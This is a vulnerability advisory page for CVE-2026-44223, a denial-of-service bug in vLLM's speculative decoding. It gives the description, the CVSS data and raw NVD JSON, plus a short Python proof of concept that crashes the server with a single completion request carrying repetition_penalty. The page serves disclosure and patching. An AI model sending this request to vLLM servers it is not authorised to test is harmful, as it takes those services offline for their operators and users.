CVE-2026-44223

Description

vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vLLM < 0.20.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# PoC for CVE-2026-44223
# Target: vLLM server versions < 0.20.0
# Description: This script sends a request with a repetition_penalty parameter
# to trigger the tensor shape mismatch bug in the speculative decoding proposer.

def check_vulnerability(target_url):
    headers = {"Content-Type": "application/json"}
    endpoint = f"{target_url}/v1/completions"
    
    # Payload containing the sampling penalty parameter that triggers the crash
    payload = {
        "model": "meta-llama/Llama-2-7b-chat-hf",  # Example model name
        "prompt": "Explain this vulnerability.",
        "max_tokens": 50,
        # The presence of 'repetition_penalty' triggers the incorrect tensor shape
        "repetition_penalty": 1.1
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, headers=headers, data=json.dumps(payload), timeout=10)
        
        # If the server crashes, the connection might be reset or return a 500 error
        if response.status_code == 500 or response.status_code == 502:
            print("[+] Potential vulnerability triggered! Server returned error code: {}".format(response.status_code))
        elif "RuntimeError" in response.text or "Internal Server Error" in response.text:
            print("[+] Vulnerability likely triggered. RuntimeError detected in response.")
        else:
            print("[-] Request completed. Server might be patched or not vulnerable.")
            print("Response status:", response.status_code)
            
    except requests.exceptions.ConnectionError:
        print("[+] Connection error. The EngineCore process may have crashed (DoS).")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44223
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44223
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44223/
[4] VulDB https://vuldb.com/cve/CVE-2026-44223
[5] https://github.com/vllm-project/vllm/pull/38610
[6] https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44223", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.293", "lastModified": "2026-05-12T20:16:43.293", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., \"repetition_penalty\": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}, {"lang": "en", "value": "CWE-704"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/pull/38610", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw", "source": "[email protected]"}]}}